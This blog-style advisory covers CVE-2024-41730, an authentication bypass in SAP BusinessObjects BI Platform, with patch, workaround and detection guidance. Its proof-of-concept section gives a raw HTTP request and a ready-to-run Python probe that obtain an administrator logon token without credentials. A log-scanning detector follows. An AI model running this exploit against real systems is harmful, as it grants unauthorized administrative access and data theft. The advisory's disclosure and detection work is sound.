On August 13, 2024, SAP released a critical security patch addressing a severe authentication vulnerability in SAP BusinessObjects Business Intelligence Platform. This blog post aims to provide an overview of the vulnerability, its potential impact, and steps for mitigation.
Vulnerability Details
- CVE ID: CVE-2024-41730
- CVSS v3.0 Base Score: 9.8 (Critical)
- Affected Component: SAP BusinessObjects Business Intelligence Platform
- Vulnerability Type: Missing Authentication Check
Description
The flaw is a missing authentication check in the Single Sign-On (trusted authentication) path of Enterprise authentication in SAP BusinessObjects Business Intelligence Platform. It is reachable only when SSO is enabled on Enterprise authentication; in that configuration an unauthenticated attacker can request a logon token for a user of their choosing, the administrator account included, from a REST endpoint of the BI Platform RESTful Web Services (biprws). The token is then accepted like any other session token, so the attacker inherits that user's rights, which for an administrator amounts to full compromise of the platform.
Impact
If successfully exploited, this vulnerability can have severe consequences:
- High impact on confidentiality: Unauthorized access to sensitive business intelligence data
- High impact on integrity: Potential manipulation of BI reports and data
- High impact on availability: Possible disruption of BI services
The critical CVSS score of 9.8 underscores the severity of this vulnerability and the urgent need for patching.
Affected Versions
- ENTERPRISE 430
- ENTERPRISE 440
PoC
The request below, as reported, is the whole exploit: the only thing identifying the caller is the X-SAP-TRUSTED-USER header, and a vulnerable server answers with a logon token for the named user. Port 6405 is the default HTTP port of the BI Platform RESTful Web Services (WACS); SAP_BOBJ stands for the target host.

GET /biprws/logon/trusted HTTP/1.1
Host: SAP_BOBJ:6405
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Priority: u=0, i
X-SAP-TRUSTED-USER: administrator
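The following script is an added example, not code from the original post or from SAP. It rebuilds the PoC request above with the standard library and decides from the reply whether the server handed out a logon token. The host, the default port 6405 and the two response shapes it parses (a JSON object with a logonToken field, or the BIPRWS XML attribute list with an attr named logonToken) are assumptions; the sample responses at the bottom are constructed so the parser can be exercised offline.

```python
# Added example (not SAP's code): send the PoC request and report whether a
# logon token came back. Port, URL scheme and response shapes are assumptions.
import json
import xml.etree.ElementTree as ET
from typing import Optional
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

TRUSTED_LOGON_PATH = "/biprws/logon/trusted"


def build_probe(host: str, port: int = 6405, user: str = "administrator",
                scheme: str = "http") -> Request:
    """Build the GET from the PoC: the only 'credential' is the X-SAP-TRUSTED-USER header."""
    req = Request(f"{scheme}://{host}:{port}{TRUSTED_LOGON_PATH}", method="GET")
    req.add_header("X-SAP-TRUSTED-USER", user)
    # Prefer JSON; the XML form is parsed as well in case the server ignores Accept.
    req.add_header("Accept", "application/json, application/xml;q=0.9")
    return req


def extract_logon_token(body: str) -> Optional[str]:
    """Return the logonToken from a logon response body, or None if there is none.

    Assumed shapes: JSON {"logonToken": "..."} or the XML attribute list
    <attrs><attr name="logonToken" type="string">...</attr></attrs> in any namespace.
    """
    body = body.strip()
    if not body:
        return None
    if body[0] == "{":
        try:
            token = json.loads(body).get("logonToken")
        except (ValueError, AttributeError):
            return None
        return token if isinstance(token, str) and token else None
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    for el in root.iter():
        # Drop any "{namespace}" prefix before comparing the tag name.
        if el.tag.rsplit("}", 1)[-1] == "attr" and el.get("name") == "logonToken":
            text = (el.text or "").strip()
            return text or None
    return None


def probe(host: str, port: int = 6405, user: str = "administrator",
          timeout: float = 10.0) -> dict:
    """Send the probe. A token in the reply means the endpoint logged us on with no credentials."""
    req = build_probe(host, port, user)
    try:
        with urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as err:  # a 401/403 still carries a body worth inspecting
        status, body = err.code, err.read().decode("utf-8", "replace")
    except URLError as err:
        return {"status": None, "token_issued": False, "error": str(err.reason)}
    token = extract_logon_token(body)
    return {"status": status, "token_issued": token is not None, "token": token}


# Constructed sample responses (not captured from a real system) for offline checks.
SAMPLE_JSON_RESPONSE = '{"logonToken": "SAP_BOBJ:6400@{3&2=5678,U3&p=40.0,U3&2v=Administrator}"}'
SAMPLE_XML_RESPONSE = (
    '<attrs xmlns="http://www.sap.com/rws/bip">'
    '<attr name="logonToken" type="string">SAP_BOBJ:6400@{3&amp;2=5678}</attr>'
    '</attrs>'
)
SAMPLE_DENIED_RESPONSE = '{"message": "logon failed"}'

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))
    else:
        for sample in (SAMPLE_JSON_RESPONSE, SAMPLE_XML_RESPONSE, SAMPLE_DENIED_RESPONSE):
            print(extract_logon_token(sample))
```

Run it with a hostname to probe a system you are authorized to test; run it without arguments to see the parser applied to the constructed samples. A non-None token from a system that should have rejected the request is the finding; the HTTP status alone is not reliable, which is why the body is parsed.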
Mitigation
SAP has released patches that add the missing authentication check. With the patch applied, Single Sign-On on Enterprise authentication is secure by default.
Patch Information
Patches are available for the following versions:
- SBOP BI PLATFORM SERVERS 4.3 – Patch Level SP005
- SBOP BI PLATFORM SERVERS 2025 – Patch Level SP00
- SBOP BI PLATFORM SERVERS 4.3 – Patch Level SP004
It is strongly recommended that all affected organizations apply these patches as soon as possible.
Workaround
SAP has not published a workaround; applying the patch is the only fix. Until it is applied, reduce exposure of the affected path: the flaw sits in the SSO function of Enterprise authentication, so disable trusted authentication if it is not actually in use, and in any case restrict network access to the RESTful Web Services port (6405 by default) to the hosts that legitimately call it. These are compensating controls, not a substitute for the patch.
Recommendations
- Inventory every SAP BusinessObjects Business Intelligence Platform instance in the organization, including non-production and vendor-managed ones, with its version and patch level; ENTERPRISE 430 and 440 are in scope.
- Patch first where trusted authentication is enabled or where the RESTful Web Services port is reachable from untrusted networks, then the remaining systems.
- Check for prior compromise before trusting a patched system: look for requests to /biprws/logon/trusted from hosts that are not your SSO application servers, and for administrator sessions you cannot tie to an administrator.
- Review whether trusted authentication is needed at all, which accounts it can map to, and which hosts can reach the biprws endpoint.
- Keep monitoring web-tier access logs and BI Platform auditing events for authentication and token issuance, and alert on trusted logons from unexpected sources.
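The following script is an added example, not code from the original post or from SAP, of the log check the last two recommendations call for. It scans web-tier access log lines for hits on /biprws/logon/trusted and flags successful ones from sources that are not on an allowlist of known SSO clients. The log format (Tomcat common log format) and the sample lines are constructed assumptions; because the X-SAP-TRUSTED-USER header is not written to a default access log, the detection keys on the request path and status.

```python
# Added example (not SAP's code): flag trusted-authentication logons in a BI Platform
# web-tier access log. Log format, allowlist and sample lines are assumptions.
import re
from collections import Counter
from typing import Dict, Iterable, List, Set

TRUSTED_LOGON_PATH = "/biprws/logon/trusted"

# Tomcat common log format: src ident user [ts] "METHOD path proto" status bytes
ACCESS_LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: one expected SSO client (10.0.0.5), one unknown host that
# obtained a token and then walked the API, and one unknown host that was refused.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [13/Aug/2024:10:15:22 +0000] "GET /biprws/logon/trusted HTTP/1.1" 200 412
10.0.0.5 - - [13/Aug/2024:10:15:23 +0000] "GET /biprws/v1/users HTTP/1.1" 200 2048
192.0.2.77 - - [13/Aug/2024:11:02:01 +0000] "GET /biprws/logon/trusted HTTP/1.1" 200 412
192.0.2.77 - - [13/Aug/2024:11:02:02 +0000] "GET /biprws/v1/documents HTTP/1.1" 200 3100
198.51.100.9 - - [13/Aug/2024:11:05:40 +0000] "GET /biprws/logon/trusted HTTP/1.1" 401 0
10.0.0.5 - - [13/Aug/2024:12:00:00 +0000] "POST /biprws/logon/long HTTP/1.1" 200 500
"""


def parse_access_log(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Parse common-log-format lines; lines that do not match are skipped."""
    parsed = []
    for line in lines:
        m = ACCESS_LOG_RE.match(line)
        if m:
            parsed.append(m.groupdict())
    return parsed


def find_trusted_logons(lines: Iterable[str],
                        allowed_sources: Set[str]) -> List[Dict[str, object]]:
    """Every hit on the trusted-logon endpoint, annotated with whether the source is an
    expected SSO client and whether the server answered 200 (token presumably issued)."""
    findings = []
    for rec in parse_access_log(lines):
        path = rec["path"].split("?", 1)[0].rstrip("/")
        if path != TRUSTED_LOGON_PATH:
            continue
        findings.append({
            "src": rec["src"],
            "ts": rec["ts"],
            "status": int(rec["status"]),
            "expected_source": rec["src"] in allowed_sources,
            "token_likely_issued": rec["status"] == "200",
        })
    return findings


def suspicious_token_issuers(findings: List[Dict[str, object]]) -> Counter:
    """Successful trusted logons per source that is not on the allowlist."""
    return Counter(f["src"] for f in findings
                   if f["token_likely_issued"] and not f["expected_source"])


if __name__ == "__main__":
    hits = find_trusted_logons(SAMPLE_ACCESS_LOG.splitlines(), {"10.0.0.5"})
    for hit in hits:
        print(hit)
    print("suspicious sources:", dict(suspicious_token_issuers(hits)))
```

Feed it the real access log and the real list of application servers that perform trusted authentication; every 200 on the trusted-logon path from any other source is a session that was opened without credentials and deserves investigation, and even refused attempts from unknown hosts show that someone is probing the endpoint.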
Conclusion
The discovery of CVE-2024-41730 highlights the ongoing importance of robust security measures in business intelligence platforms. Organizations using SAP BusinessObjects Business Intelligence Platform should treat this vulnerability with utmost urgency and apply the patches immediately to protect their critical business data and operations.